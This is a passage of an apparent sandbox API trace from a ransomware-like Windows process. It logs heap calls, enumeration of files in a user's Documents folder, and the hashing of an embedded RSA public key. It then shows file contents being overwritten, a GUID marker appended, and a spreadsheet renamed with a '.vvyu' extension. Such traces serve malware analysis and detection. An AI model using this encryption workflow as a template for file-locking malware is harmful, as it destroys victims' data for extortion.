hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2b60 | out: hHeap=0x2c0000) returned 1 [0189.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.205] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x12336, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x12336, lpOverlapped=0x0) returned 1 [0189.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.207] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1233b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.207] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0189.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.208] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.209] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.209] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.209] CloseHandle (hObject=0x584) returned 1 [0189.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0189.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0189.211] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\M-_W92CtTuHd9hF.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\m-_w92cttuhd9hf.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\M-_W92CtTuHd9hF.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\m-_w92cttuhd9hf.xlsx.vvyu")) returned 1 [0189.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.212] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0189.215] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fa890e0, ftCreationTime.dwHighDateTime=0x1d82093, ftLastAccessTime.dwLowDateTime=0x1d38f160, ftLastAccessTime.dwHighDateTime=0x1d86bea, ftLastWriteTime.dwLowDateTime=0x1d38f160, ftLastWriteTime.dwHighDateTime=0x1d86bea, nFileSizeHigh=0x0, nFileSizeLow=0x14019, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MuVmmckS_6uXC.pptx", cAlternateFileName="MUVMMC~1.PPT")) returned 1 [0189.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2b60 [0189.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2b60 | out: hHeap=0x2c0000) returned 1 [0189.216] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\MuVmmckS_6uXC.pptx") returned=".pptx" [0189.216] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\MuVmmckS_6uXC.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\muvmmcks_6uxc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.216] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=81945) returned 1 [0189.216] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.220] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13ff3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.220] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.223] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.223] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x14019, lpOverlapped=0x0) returned 1 [0189.225] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.225] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.225] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.225] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.227] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.227] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.227] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.227] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.227] GetLastError () returned 0x0 [0189.227] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.228] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.228] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.228] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.228] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14020) returned 0x2af5168 [0189.229] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2b60 [0189.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0189.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2ba8 [0189.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.230] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daf0 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dad8 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0189.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.233] GetCurrentThreadId () returned 0x5d8 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae42a8 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.233] GetCurrentThreadId () returned 0x5d8 [0189.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daf0 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db50 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db68 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db08 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 